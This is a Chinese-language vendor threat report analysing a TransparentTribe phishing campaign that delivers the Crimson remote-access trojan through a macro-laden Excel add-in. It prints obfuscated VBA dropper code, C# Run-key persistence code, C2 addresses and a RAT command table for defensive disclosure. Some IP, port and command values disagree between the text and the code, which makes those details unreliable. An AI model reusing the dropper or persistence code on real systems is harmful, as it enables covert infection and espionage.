概述
2024年5月,瑞星威胁情报平台捕获到一起攻击事件,该事件中使用的诱饵文档与印度什里·拉姆夫人女子学院的宏观经济学课程有关,猜测攻击目标可能是与此相关的学生或者研究人员等。在攻击过程中,攻击者可能通过钓鱼邮件向目标投递恶意宏文档eco.xlam,利用宏代码释放同名诱饵文档eco.xlsx迷惑用户以及释放Crimson远控木马对目标进行窃密远程控制等恶意操作。
通过攻击手法等猜测此次事件可能和攻击组织TransparentTribe有关联。TransparentTribe是一个自2013年以来一直在活跃着的威胁组织。这个组织又被称为透明部落、APT 36、ProjectM、Mythic Leopard和EMP.Lapis。有信息表明该组织疑似具有巴基斯坦背景,由国家支持。该组织主要目的是信息盗窃和间谍活动,其目标包括阿富汗、印度、哈萨克斯坦和沙特阿拉伯等,涉及行业多为教育、国防和政府等领域。
ATT&CK 矩阵
| 战术 | 技术 | 具体行为 |
|---|---|---|
TA0002-执行 |
T1204-用户执行 |
诱骗用户执行恶意宏文档 |
TA0003-持久化 |
T1547-启动或登录自动执行 |
设置注册表实现远控程序自启动 |
TA0005-防御规避 |
T1027-混淆过的文件或信息 |
宏文档中含有的木马程序被压缩和Base64编码 |
TA0005-防御规避 |
T1140-去混淆或解密文件和信息 |
Base64解码和解压得到远控木马 |
TA0007-环境发现 |
T1057-收集进程信息 |
远控木马收集进程列表 |
TA0007-环境发现 |
T1082-收集系统信息 |
远控木马收集系统信息 |
TA0007-环境发现 |
T1083-枚举文件和目录 |
远控木马收集指定文件信息 |
TA0009-收集信息 |
T1113-屏幕截图 |
远控木马会对屏幕进行截图并上传 |
TA0010-外传信息 |
T1041-通过C2通道外传 |
远控木马通过C2通道进行远程通信 |
TA0011-指挥与控制 |
T1095-非应用层协议 |
远控木马使用TCP协议进行网络通信 |
TA0011-指挥与控制 |
T1105-文件传输工具 |
远控木马可以下发文件到指定目录中 |
TA0040-影响 |
T1485-数据销毁 |
远控木马可以删除指定文件 |
事件详情
攻击者所投递的诱饵文档内容涉及印度什里·拉姆夫人女子学院的宏观经济学课程介绍及相关信息。
攻击流程
攻击者所投递的样本名为eco.xlam,带有恶意宏代码。当受害者打开该文档后,宏代码会释放诱饵文档迷惑用户,之后还会释放Crimson远控木马对用户进行窃密,远程控制等恶意操作。
相关负载分析
eco.xlam分析
| 字段 | 内容 |
|---|---|
| 文件名 | eco.xlam |
| 文件大小 | 8307310 bytes |
| 文件MD5 | AD90E16EA4A9FE11525DA7669CB4B8EE |
| 文件类型 | xlam |
| 病毒名 | Dropper.StealthLoader/VBA!1.BF03 |
在%userprofile%\Appdata目录中创建文件夹,文件夹名是Data拼接上当前秒数和当前分钟数(Data秒数分钟数)。
'查询目录是否存在,不存在就创建
If Dir(folder_musiqhterv__name, vbDirectory) = "" Then
MkDir (folder_musiqhterv__name)
End If 将eco.xlam宏文档作为zip格式的压缩包,获取其内的子文件,将它们存在%userprofile%\Appdata\Data秒数分钟数文件夹下。
smusiqhterveName = ThisWorkbook.Name
folder_musiqhterv_zipfl = folder_musiqhterv__name & smusiqhterveName & Replace(".zi_p", "_", "")
If Dir(folder_musiqhterv_zipfl, vbDirectory) = "" Then
FDermusiqhtervsSiO.CopyFile ThisWorkbook.FullName, folder_musiqhterv_zipfl, True
musiqhtervpdsp.Namespace(folder_musiqhterv__name).CopyHere musiqhtervpdsp.Namespace(folder_musiqhterv_zipfl).items
End If 根据不同的操作系统获取不同的文件。如果当前操作系统版本信息内带有10.0字样,则获取oleObject11.bin文件,如果版本内带有.01字样,则获取oleObject07.bin文件,其他情况则获取oleObject10.bin文件。
If InStr(Application.OperatingSystem, "10.0") Then
musiqhtervIput = readbnfile(folder_musiqhterv__name & Replace("x_l\embe_ddings\oleOb_ject11.bi_n", "_", ""))
Else
If InStr(Application.OperatingSystem, ".01") Then
musiqhtervIput = readbnfile(folder_musiqhterv__name & Replace("x_l\embe_ddings\oleOb_ject07.bi_n", "_", ""))
Else
musiqhtervIput = readbnfile(folder_musiqhterv__name & Replace("x_l\embe_ddings\oleOb_ject10.bi_n", "_", ""))
End If
End If 将上述获取的文件进行Base64解码,然后将其命为vhcrvdh iobv.zip写入到%userprofile%\Appdata文件夹下。
arrmusiqhtervut = DecoBae6f(musiqhtervIput)
'%userprofile%\Appdata\vhcrvdh iobv.zip
Set objmusiqhtervFSOFile = objmusiqhtervFSO.CreateTextFile(folder_musiqhterv_tair_zip & file_musiqhterv_tair_zip, True)
objmusiqhtervFSOFile.Write BiryToring(arrmusiqhtervut) 将vhcrvdh iobv.zip压缩包内的子文件vhcrvdh iobv.png解压到%userprofile%\Documents目录下,重命名为vhcrvdh iobv.scr。
'解压
musiqhtervpdsp.Namespace(folder_musiqhterv_tair_final).CopyHere musiqhtervpdsp.Namespace(folder_musiqhterv_tair_zip & file_musiqhterv_tair_zip).items
Name folder_musiqhterv_tair_final & file_musiqhterv_tair_png As folder_musiqhterv_finalfile 启动vhcrvdh iobv.scr。vhcrvdh iobv.scr带有IE浏览器图标,与Crimson远控木马相关。
Call Shell("""" & folder_musiqhterv_finalfile & """ """, vbMaximizedFocus) 在%userprofile%\Downloads目录中释放同名的xlsx格式的诱饵文档,接着 打开诱饵文档迷惑用户。
docvvsath = VBA.Environ$("USERPROFILE") & "\Downloads\" & smusiqhterveName & ".xl" & Replace("sx_ps", "_ps", "")
If Dir(docvvsath) = "" Then
Name folder_musiqhterv__name & Replace("x_l\embe_ddings\oleOb_ject3.bi_n", "_", "") As docvvsath
End If
Workbooks.Open Filename:=docvvsathvhcrvdh iobv.scr分析
| 字段 | 内容 |
|---|---|
| 文件名 | vhcrvdh iobv.scr |
| 文件大小 | 23437312 bytes |
| 文件MD5 | DA2331AC3E073164D54BCC5323CF0250 |
| 文件类型 | PE |
| 病毒名 | Backdoor.Crimson!1.EA63 |
经分析发现攻击者最终投递的恶意程序vhcrvdh iobv.scr是个Crimson远控木马。该木马由C#编写,会通过设置注册表使自身开机自启。
string name = "SOF_TW_A_RE\\Mic_ro_soft\\Win_dows\\Cur_re_ntVers_ion\\_Run".Replace("_", "");
RegistryKey registryKey = Registry.CurrentUser.OpenSubKey(name, true);
object value = registryKey.GetValue(DIFRVFSEF.pawdifird + app);
bool flag = value == null || value.ToString() != path;
if (flag)
{
registryKey.SetValue(DIFRVFSEF.pawdifird + app, path);
} 通信地址为waqers.duckdns.org或者94.72.105.227,相关端口包含11248、16796、18868、22245、26424。
public static string maisdwtp = "221.120.112.150".Replace("_", "");
public static int[] ports = new int[]
{
11248,
16896,
18868,
22245,
26424
};建立网络通信后,根据不同的远控指令执行不同的恶意操作。
text = text.Insert(3, "5");
bool flag4 = text == "thy5umb";
if (flag4)
{
this.imageiWails(procss_type[1]);
}
bool flag5 = text == "scy5rsz";
if (flag5)
{
this.dsecrsize(procss_type[1]);
}
bool flag6 = text == "gey5tavs";
if (flag6)
{
this.objsTdead = delegate()
{
this.macEsrorcss("geytavs");
};
this.funtdsVad = new Thread(this.objsTdead);
this.funtdsVad.Start();
}| 远控指令 | 操作 |
|---|---|
| thd5umb | 获取指定gif图片以及图片名字、创建时间和大小 |
| scy5rsz | 设置截屏大小 |
| gey5tavs | 获取所有进程ID和进程名 |
| scy5uren scy5ren scyr5en scyu5ren |
持续进行屏幕截图和回传 |
| pry5ocl | 获取所有进程ID和进程名 |
| puy5tsrt | 设置注册表使当前程序自启动 |
| doy5wf | 下发文件到指定路径 |
| cdy5crgn csy5crgn csy5dcrgn |
屏幕截图并回传 |
| diy5rs | 获取计算机上的驱动器名称 |
| fiy5lsz | 获取指定文件的名称,创建时间和文件大小 |
| iny5fo | 获取受感染主机的系统版本、用户域、用户名以及CrimsonRAT版本信息 |
| liy5stf | 获取指定目录下拥有特定扩展名的文件名称、创建时间和文件大小 |
| fly5es | 获取指定目录中的文件列表 |
| ruy5nf | 运行指定程序 |
| afy5ile | 获取指定文件内容 |
| udy5lt | 在当前程序目录中下发itaivsasidr.exe并运行 |
| fiy5le | 获取指定文件内容 |
| sty5ops | 停止屏幕截图 |
| cny5ls | 中断截图和中断数据下发 |
| dey5lt | 删除指定文件 |
| doy5wr | 下发数据到指定文件 |
| fly5dr | 获取指定目录中可访问的子目录 |
攻击过程可视化(EDR)
瑞星EDR上详细记录了主机上的程序活动,通过威胁可视化调查功能,可以对本次攻击过程进行还原以及关系网展示。图中展示了本次攻击活动中涉及到的进程树以及相关的文件和文件流向等情况。
总结
APT攻击有着针对性强、组织严密、持续时间长、高隐蔽性和间接攻击的显著特征,针对的目标都是具有重大信息资产,如国家军事、情报、战略部门和影响国计民生的行业如金融、能源等,国内相关政府机构和企业单位务必要引起重视,加强防御措施。
预防措施
-
不打开可疑文件。
不打开未知来源的可疑的文件和邮件,防止社会工程学和钓鱼攻击。
-
部署网络安全态势感知、预警系统等网关安全产品。
网关安全产品可利用威胁情报追溯威胁行为轨迹,帮助用户进行威胁行为分析、定位威胁源和目的,追溯攻击的手段和路径,从源头解决网络威胁,最大范围内发现被攻击的节点,帮助企业更快响应和处理。
-
安装有效的杀毒软件,拦截查杀恶意文档和木马病毒。
杀毒软件可拦截恶意文档和木马病毒,如果用户不小心下载了恶意文件,杀毒软件可拦截查杀,阻止病毒运行,保护用户的终端安全。
瑞星ESM目前已经可以检出此次攻击事件的相关样本。
- 及时修补系统补丁和重要软件的补丁。
沦陷信标(IOC)
-
MD5
AD90E16EA4A9FE11525DA7669CB4B8EE DA2331AC3E073164D54BCC5323CF0250 AC5D452F7C5D96BE4B7B6379E15AB240 E63B3903F7A029E3F154A7164ABBA9BC B831179225D01FE223005BDD985BE098 A54C435BDBC17608FA0B8826BBE9936D E6F4BB8ED235F43CB738447FBF1757C3 -
IPV4
94.72.105.227 -
Domain
waqers.duckdns.org -
瑞星病毒名
Backdoor.Crimson!1.EA63
